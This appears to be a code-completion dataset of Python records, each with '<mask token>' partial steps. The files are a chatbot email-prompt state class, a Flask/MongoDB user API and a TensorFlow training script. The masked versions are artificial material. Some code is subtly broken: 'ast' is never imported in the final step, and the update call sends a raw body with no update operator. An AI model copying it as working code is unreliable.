fig.savefig('plots_to_sort/MeanR_%s.png'%(sim))\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
class StartStateImpl:
start_message = "Для продолжения мне необходим ваш корпоративный E-mail"\
"Адрес вида: <адрес>@edu.hse.ru (без кавычек)"
thank_you = "Спасибо за ваш адрес. Продолжаем."
def __init__(self):
pass
def enter_state(self, message, user):
user.send_message(StartStateImpl.start_message)
def exit_state(self, message, user):
user.send_message(StartStateImpl.thank_you)
def update_state(self, message, user):
pass
class StartState(StartStateImpl):
obj = None
def __new__(cls, *args, **kwargs):
if cls.obj is None:
cls.obj = StartStateImpl()
return cls.obj
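
# Minimal usage sketch: every StartState() call hands back the same cached
# StartStateImpl instance, because __new__ short-circuits to cls.obj.
if __name__ == "__main__":
    first = StartState()
    second = StartState()
    assert first is second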
|
normal
|
{
"blob_id": "3741e44178375f351278cb17c2bf8f11c69e1262",
"index": 4009,
"step-1": "class StartStateImpl:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def exit_state(self, message, user):\n user.send_message(StartStateImpl.thank_you)\n <mask token>\n\n\nclass StartState(StartStateImpl):\n obj = None\n\n def __new__(cls, *args, **kwargs):\n if cls.obj is None:\n cls.obj = StartStateImpl()\n return cls.obj\n",
"step-2": "class StartStateImpl:\n <mask token>\n <mask token>\n\n def __init__(self):\n pass\n <mask token>\n\n def exit_state(self, message, user):\n user.send_message(StartStateImpl.thank_you)\n <mask token>\n\n\nclass StartState(StartStateImpl):\n obj = None\n\n def __new__(cls, *args, **kwargs):\n if cls.obj is None:\n cls.obj = StartStateImpl()\n return cls.obj\n",
"step-3": "class StartStateImpl:\n <mask token>\n <mask token>\n\n def __init__(self):\n pass\n\n def enter_state(self, message, user):\n user.send_message(StartStateImpl.start_message)\n\n def exit_state(self, message, user):\n user.send_message(StartStateImpl.thank_you)\n <mask token>\n\n\nclass StartState(StartStateImpl):\n obj = None\n\n def __new__(cls, *args, **kwargs):\n if cls.obj is None:\n cls.obj = StartStateImpl()\n return cls.obj\n",
"step-4": "class StartStateImpl:\n <mask token>\n <mask token>\n\n def __init__(self):\n pass\n\n def enter_state(self, message, user):\n user.send_message(StartStateImpl.start_message)\n\n def exit_state(self, message, user):\n user.send_message(StartStateImpl.thank_you)\n\n def update_state(self, message, user):\n pass\n\n\nclass StartState(StartStateImpl):\n obj = None\n\n def __new__(cls, *args, **kwargs):\n if cls.obj is None:\n cls.obj = StartStateImpl()\n return cls.obj\n",
"step-5": "class StartStateImpl:\n start_message = \"Для продолжения мне необходим ваш корпоративный E-mail\"\\\n \"Адрес вида: <адрес>@edu.hse.ru (без кавычек)\"\n thank_you = \"Спасибо за ваш адрес. Продолжаем.\"\n\n def __init__(self):\n pass\n\n def enter_state(self, message, user):\n user.send_message(StartStateImpl.start_message)\n\n def exit_state(self, message, user):\n user.send_message(StartStateImpl.thank_you)\n\n def update_state(self, message, user):\n pass\n\n\nclass StartState(StartStateImpl):\n obj = None\n\n def __new__(cls, *args, **kwargs):\n if cls.obj is None:\n cls.obj = StartStateImpl()\n return cls.obj\n",
"step-ids": [
5,
6,
7,
8,
10
]
}
|
[
5,
6,
7,
8,
10
] |
"""This module will serve the api request."""
import ast
import json
from bson.json_util import dumps
from flask import abort, request, Response, jsonify
from api import app, collection
@app.route("/api/v1/users", methods=['POST'])
def create_user():
"""
Function to create new users.
"""
try:
# Create new user
try:
body = request.get_json()
except:
# Bad request as request body is not available
return abort(400)
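        # Collection.insert() is the legacy PyMongo API (removed in PyMongo 4.x);
        # insert_one(body) is the modern equivalent if a newer driver is in use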
record_id = collection.insert(body)
return jsonify({"message":"Successfully Created the resource."}), 201
except:
# Error while trying to create the resource
return "Error while trying to create the resource", 500
@app.route("/api/v1/users", methods=['GET'])
def fetch_users():
"""
Function to fetch the users.
"""
try:
# Fetch all the record(s)
records_fetched = collection.find()
# Check if the records are found
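        # note: Cursor.count() only exists on older PyMongo drivers (removed in 4.x);
        # collection.count_documents({}) is the current way to get this count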
if records_fetched.count() > 0:
# Prepare the response
records = dumps(records_fetched)
resp = Response(records, status=200, mimetype='application/json')
return resp
else:
# No records are found
return jsonify({"message":"No records are found"}), 404
except Exception as e:
print(str(e))
# Error while trying to fetch the resource
return jsonify({"message":"Error while trying to fetch the resource"}), 500
@app.route("/api/v1/users/<user_id>", methods=['POST'])
def update_user(user_id):
"""
Function to update the user.
"""
try:
# Get the value which needs to be updated
try:
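            # round-trip the parsed body: json.dumps() serialises it back to a string and
            # ast.literal_eval() re-parses it into a plain dict (needs the ast import above)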
body = ast.literal_eval(json.dumps(request.get_json()))
except:
# Bad request as the request body is not available
# Add message for debugging purpose
return "", 400
# Updating the user
        records_updated = collection.update_one({"id": int(user_id)}, {"$set": body})
# Check if resource is updated
if records_updated.modified_count > 0:
# Prepare the response as resource is updated successfully
return "", 200
else:
# Bad request as the resource is not available to update
# Add message for debugging purpose
return "", 404
except:
# Error while trying to update the resource
# Add message for debugging purpose
return "", 500
@app.route("/api/v1/users/<user_id>", methods=['DELETE'])
def remove_user(user_id):
"""
Function to remove the user.
"""
try:
# Delete the user
delete_user = collection.delete_one({"id": int(user_id)})
if delete_user.deleted_count > 0 :
# Prepare the response
return "", 204
else:
# Resource Not found
return "", 404
except:
# Error while trying to delete the resource
# Add message for debugging purpose
return "", 500
@app.errorhandler(404)
def page_not_found(e):
"""Send message to the user with notFound 404 status."""
# Message to the user
message = {
"err":
{
"msg": "This route is currently not supported. Please refer API documentation."
}
}
# Making the message looks good
resp = jsonify(message)
# Sending OK response
resp.status_code = 404
# Returning the object
return resp
|
normal
|
{
"blob_id": "0f4bb65b93df997ca1a9b7945ebcec53a2f43822",
"index": 3636,
"step-1": "<mask token>\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n delete_user = collection.delete_one({'id': int(user_id)})\n if delete_user.deleted_count > 0:\n return '', 204\n else:\n return '', 404\n except:\n return '', 500\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n delete_user = collection.delete_one({'id': int(user_id)})\n if delete_user.deleted_count > 0:\n return '', 204\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected](404)\ndef page_not_found(e):\n \"\"\"Send message to the user with notFound 404 status.\"\"\"\n message = {'err': {'msg':\n 'This route is currently not supported. Please refer API documentation.'\n }}\n resp = jsonify(message)\n resp.status_code = 404\n return resp\n",
"step-4": "<mask token>\nimport json\nfrom bson.json_util import dumps\nfrom flask import abort, request, Response, jsonify\nfrom api import app, collection\n\n\[email protected]('/api/v1/users', methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n try:\n body = request.get_json()\n except:\n return abort(400)\n record_id = collection.insert(body)\n return jsonify({'message': 'Successfully Created the resource.'}), 201\n except:\n return 'Error while trying to create the resource', 500\n\n\[email protected]('/api/v1/users', methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n records_fetched = collection.find()\n if records_fetched.count() > 0:\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n return jsonify({'message': 'No records are found'}), 404\n except Exception as e:\n print(str(e))\n return jsonify({'message': 'Error while trying to fetch the resource'}\n ), 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return '', 400\n records_updated = collection.update_one({'id': int(user_id)}, body)\n if records_updated.modified_count > 0:\n return '', 200\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected]('/api/v1/users/<user_id>', methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n delete_user = collection.delete_one({'id': int(user_id)})\n if delete_user.deleted_count > 0:\n return '', 204\n else:\n return '', 404\n except:\n return '', 500\n\n\[email protected](404)\ndef page_not_found(e):\n \"\"\"Send message to the user with notFound 404 status.\"\"\"\n message = {'err': {'msg':\n 'This route is currently not supported. Please refer API documentation.'\n }}\n resp = jsonify(message)\n resp.status_code = 404\n return resp\n",
"step-5": "\"\"\"This module will serve the api request.\"\"\"\n\nimport json\nfrom bson.json_util import dumps\nfrom flask import abort, request, Response, jsonify\nfrom api import app, collection\n\n\[email protected](\"/api/v1/users\", methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n # Create new user\n try:\n body = request.get_json()\n except:\n # Bad request as request body is not available\n return abort(400)\n\n record_id = collection.insert(body)\n return jsonify({\"message\":\"Successfully Created the resource.\"}), 201\n\n except:\n # Error while trying to create the resource\n return \"Error while trying to create the resource\", 500\n\n\[email protected](\"/api/v1/users\", methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n # Fetch all the record(s)\n records_fetched = collection.find()\n\n # Check if the records are found\n if records_fetched.count() > 0:\n # Prepare the response\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n # No records are found\n return jsonify({\"message\":\"No records are found\"}), 404\n except Exception as e:\n print(str(e))\n # Error while trying to fetch the resource\n return jsonify({\"message\":\"Error while trying to fetch the resource\"}), 500\n\n\[email protected](\"/api/v1/users/<user_id>\", methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n # Get the value which needs to be updated\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n # Bad request as the request body is not available\n # Add message for debugging purpose\n return \"\", 400\n\n # Updating the user\n records_updated = collection.update_one({\"id\": int(user_id)}, body)\n\n # Check if resource is updated\n if records_updated.modified_count > 0:\n # Prepare the response as resource is updated successfully\n return \"\", 200\n else:\n # Bad request as the resource is not available to update\n # Add message for debugging purpose\n return \"\", 404\n except:\n # Error while trying to update the resource\n # Add message for debugging purpose\n return \"\", 500\n\n\[email protected](\"/api/v1/users/<user_id>\", methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n # Delete the user\n delete_user = collection.delete_one({\"id\": int(user_id)})\n\n if delete_user.deleted_count > 0 :\n # Prepare the response\n return \"\", 204\n else:\n # Resource Not found\n return \"\", 404\n except:\n # Error while trying to delete the resource\n # Add message for debugging purpose\n return \"\", 500\n\n\[email protected](404)\ndef page_not_found(e):\n \"\"\"Send message to the user with notFound 404 status.\"\"\"\n # Message to the user\n message = {\n \"err\":\n {\n \"msg\": \"This route is currently not supported. Please refer API documentation.\"\n }\n }\n # Making the message looks good\n resp = jsonify(message)\n # Sending OK response\n resp.status_code = 404\n # Returning the object\n return resp\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import tensorflow as tf
import blood_model
import os
import numpy as np
FLAGS = tf.app.flags.FLAGS
RUN = 'new_test_hm'
tf.app.flags.DEFINE_string('checkpoint_dir', RUN+'/checkpoints',
"""Directory where to write event logs and checkpoint.""")
tf.app.flags.DEFINE_string('summaries_dir', RUN+'/summaries',
"""Summaries directory""")
tf.app.flags.DEFINE_integer('max_steps', 20000,
                            """Maximum steps to train the model""")
tf.app.flags.DEFINE_boolean('continue_run', True,
                            """Continue from when training stopped?""")
def train():
"""Train blood_model for a number of steps. Periodically evaluate training and validation accuracies """
global_step = tf.Variable(0, name='global_step', trainable=False)
# Get images and labels for blood_model.
blood_datasets = blood_model.inputs(eval_data=False)
# randomize the inputs look
x, y_, data, keep_prob = blood_model.prepare_input()
# build the convolution network
conv_output, _, _, _, _ = blood_model.inference(data, keep_prob)
# Calculate loss.
loss = blood_model.loss(conv_output, y_)
accuracy = blood_model.accuracy(conv_output, y_)
train_op = blood_model.train(loss, global_step)
sess = tf.InteractiveSession()
sess.run(tf.initialize_all_variables())
# Build the summary operation based on the TF collection of Summaries.
summary_op = tf.merge_all_summaries()
saver = tf.train.Saver()
check_filesystem()
train_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/train', sess.graph)
validation_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/validation', sess.graph)
test_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/test', sess.graph)
_ = reload_checkpoint_if_exists(sess, saver, train_writer, validation_writer, test_writer)
for step in range(tf.train.global_step(sess, global_step)+1, FLAGS.max_steps):
batch = blood_datasets.train.next_batch()
_, loss_output = sess.run([train_op, loss], feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
assert not np.isnan(loss_output)
if step % 100 == 0:
summary, train_accuracy = sess.run([summary_op, accuracy], feed_dict={
x: batch[0], y_: batch[1], keep_prob: 1.0})
train_writer.add_summary(summary, step)
print("step %d, training accuracy %g, loss %g" % (step, train_accuracy, loss_output))
if (step % 1000 == 0 or (step + 1) == FLAGS.max_steps) and not step == 0:
batch = blood_datasets.validation.next_batch()
summary_validation, accuracy_validation = sess.run([summary_op, accuracy], feed_dict={
x: batch[0], y_: batch[1], keep_prob: 1.0})
validation_writer.add_summary(summary_validation, step)
print("validation accuracy %g" % accuracy_validation)
# save checkpoint
checkpoint_path = os.path.join(FLAGS.checkpoint_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
print("saving checkpoint")
def check_filesystem():
"""
either start a new checkpoint or continue from existing checkpoint folder
"""
if FLAGS.continue_run:
        # continuing an existing run: check whether the directories already exist;
        # create any that are missing, but never delete what is there
if not tf.gfile.Exists(FLAGS.summaries_dir):
tf.gfile.MakeDirs(FLAGS.summaries_dir)
tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))
tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))
tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))
if not tf.gfile.Exists(FLAGS.checkpoint_dir):
tf.gfile.MakeDirs(FLAGS.checkpoint_dir)
else:
# delete checkpoints and event summaries because training restarted
if tf.gfile.Exists(FLAGS.summaries_dir):
tf.gfile.DeleteRecursively(FLAGS.summaries_dir)
tf.gfile.MakeDirs(FLAGS.summaries_dir)
tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))
tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))
tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))
if tf.gfile.Exists(FLAGS.checkpoint_dir):
tf.gfile.DeleteRecursively(FLAGS.checkpoint_dir)
tf.gfile.MakeDirs(FLAGS.checkpoint_dir)
def reload_checkpoint_if_exists(sess, saver, train_writer, validation_writer, test_writer):
"""
restore existing model from checkpoint data
"""
global_step = -1
if FLAGS.continue_run:
ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(sess, ckpt.model_checkpoint_path)
# extract global_step from it.
global_step = int(ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1])
print("checkpoint found at step %d", global_step)
# ensure that the writers ignore saved summaries that occurred after the last checkpoint but before a crash
train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)
validation_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)
test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)
else:
print('No checkpoint file found')
return global_step
def main(argv=None):
train()
if __name__ == '__main__':
tf.app.run()
|
normal
|
{
"blob_id": "f653e906d3026de4bb1e705162f4321bb75e8705",
"index": 4166,
"step-1": "<mask token>\n\n\ndef check_filesystem():\n \"\"\"\n either start a new checkpoint or continue from existing checkpoint folder\n \"\"\"\n if FLAGS.continue_run:\n if not tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if not tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n else:\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.DeleteRecursively(FLAGS.checkpoint_dir)\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n\n\ndef reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer):\n \"\"\"\n restore existing model from checkpoint data\n \"\"\"\n global_step = -1\n if FLAGS.continue_run:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].\n split('-')[-1])\n print('checkpoint found at step %d', global_step)\n train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog\n .START), global_step)\n validation_writer.add_session_log(tf.SessionLog(status=tf.\n SessionLog.START), global_step)\n test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.\n START), global_step)\n else:\n print('No checkpoint file found')\n return global_step\n\n\ndef main(argv=None):\n train()\n\n\n<mask token>\n",
"step-2": "<mask token>\ntf.app.flags.DEFINE_string('checkpoint_dir', RUN + '/checkpoints',\n 'Directory where to write event logs and checkpoint.')\ntf.app.flags.DEFINE_string('summaries_dir', RUN + '/summaries',\n 'Summaries directory')\ntf.app.flags.DEFINE_string('max_steps', 20000,\n 'Maximum steps to train the model')\ntf.app.flags.DEFINE_string('continue_run', True,\n 'Continue from when training stopped?')\n\n\ndef train():\n \"\"\"Train blood_model for a number of steps. Periodically evaluate training and validation accuracies \"\"\"\n global_step = tf.Variable(0, name='global_step', trainable=False)\n blood_datasets = blood_model.inputs(eval_data=False)\n x, y_, data, keep_prob = blood_model.prepare_input()\n conv_output, _, _, _, _ = blood_model.inference(data, keep_prob)\n loss = blood_model.loss(conv_output, y_)\n accuracy = blood_model.accuracy(conv_output, y_)\n train_op = blood_model.train(loss, global_step)\n sess = tf.InteractiveSession()\n sess.run(tf.initialize_all_variables())\n summary_op = tf.merge_all_summaries()\n saver = tf.train.Saver()\n check_filesystem()\n train_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/train',\n sess.graph)\n validation_writer = tf.train.SummaryWriter(FLAGS.summaries_dir +\n '/validation', sess.graph)\n test_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/test',\n sess.graph)\n _ = reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer)\n for step in range(tf.train.global_step(sess, global_step) + 1, FLAGS.\n max_steps):\n batch = blood_datasets.train.next_batch()\n _, loss_output = sess.run([train_op, loss], feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 0.5})\n assert not np.isnan(loss_output)\n if step % 100 == 0:\n summary, train_accuracy = sess.run([summary_op, accuracy],\n feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0})\n train_writer.add_summary(summary, step)\n print('step %d, training accuracy %g, loss %g' % (step,\n train_accuracy, loss_output))\n if (step % 1000 == 0 or step + 1 == FLAGS.max_steps) and not step == 0:\n batch = blood_datasets.validation.next_batch()\n summary_validation, accuracy_validation = sess.run([summary_op,\n accuracy], feed_dict={x: batch[0], y_: batch[1], keep_prob:\n 1.0})\n validation_writer.add_summary(summary_validation, step)\n print('validation accuracy %g' % accuracy_validation)\n checkpoint_path = os.path.join(FLAGS.checkpoint_dir, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=step)\n print('saving checkpoint')\n\n\ndef check_filesystem():\n \"\"\"\n either start a new checkpoint or continue from existing checkpoint folder\n \"\"\"\n if FLAGS.continue_run:\n if not tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if not tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n else:\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.DeleteRecursively(FLAGS.checkpoint_dir)\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n\n\ndef 
reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer):\n \"\"\"\n restore existing model from checkpoint data\n \"\"\"\n global_step = -1\n if FLAGS.continue_run:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].\n split('-')[-1])\n print('checkpoint found at step %d', global_step)\n train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog\n .START), global_step)\n validation_writer.add_session_log(tf.SessionLog(status=tf.\n SessionLog.START), global_step)\n test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.\n START), global_step)\n else:\n print('No checkpoint file found')\n return global_step\n\n\ndef main(argv=None):\n train()\n\n\nif __name__ == '__main__':\n tf.app.run()\n",
"step-3": "<mask token>\nFLAGS = tf.app.flags.FLAGS\nRUN = 'new_test_hm'\ntf.app.flags.DEFINE_string('checkpoint_dir', RUN + '/checkpoints',\n 'Directory where to write event logs and checkpoint.')\ntf.app.flags.DEFINE_string('summaries_dir', RUN + '/summaries',\n 'Summaries directory')\ntf.app.flags.DEFINE_string('max_steps', 20000,\n 'Maximum steps to train the model')\ntf.app.flags.DEFINE_string('continue_run', True,\n 'Continue from when training stopped?')\n\n\ndef train():\n \"\"\"Train blood_model for a number of steps. Periodically evaluate training and validation accuracies \"\"\"\n global_step = tf.Variable(0, name='global_step', trainable=False)\n blood_datasets = blood_model.inputs(eval_data=False)\n x, y_, data, keep_prob = blood_model.prepare_input()\n conv_output, _, _, _, _ = blood_model.inference(data, keep_prob)\n loss = blood_model.loss(conv_output, y_)\n accuracy = blood_model.accuracy(conv_output, y_)\n train_op = blood_model.train(loss, global_step)\n sess = tf.InteractiveSession()\n sess.run(tf.initialize_all_variables())\n summary_op = tf.merge_all_summaries()\n saver = tf.train.Saver()\n check_filesystem()\n train_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/train',\n sess.graph)\n validation_writer = tf.train.SummaryWriter(FLAGS.summaries_dir +\n '/validation', sess.graph)\n test_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/test',\n sess.graph)\n _ = reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer)\n for step in range(tf.train.global_step(sess, global_step) + 1, FLAGS.\n max_steps):\n batch = blood_datasets.train.next_batch()\n _, loss_output = sess.run([train_op, loss], feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 0.5})\n assert not np.isnan(loss_output)\n if step % 100 == 0:\n summary, train_accuracy = sess.run([summary_op, accuracy],\n feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0})\n train_writer.add_summary(summary, step)\n print('step %d, training accuracy %g, loss %g' % (step,\n train_accuracy, loss_output))\n if (step % 1000 == 0 or step + 1 == FLAGS.max_steps) and not step == 0:\n batch = blood_datasets.validation.next_batch()\n summary_validation, accuracy_validation = sess.run([summary_op,\n accuracy], feed_dict={x: batch[0], y_: batch[1], keep_prob:\n 1.0})\n validation_writer.add_summary(summary_validation, step)\n print('validation accuracy %g' % accuracy_validation)\n checkpoint_path = os.path.join(FLAGS.checkpoint_dir, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=step)\n print('saving checkpoint')\n\n\ndef check_filesystem():\n \"\"\"\n either start a new checkpoint or continue from existing checkpoint folder\n \"\"\"\n if FLAGS.continue_run:\n if not tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if not tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n else:\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.DeleteRecursively(FLAGS.checkpoint_dir)\n 
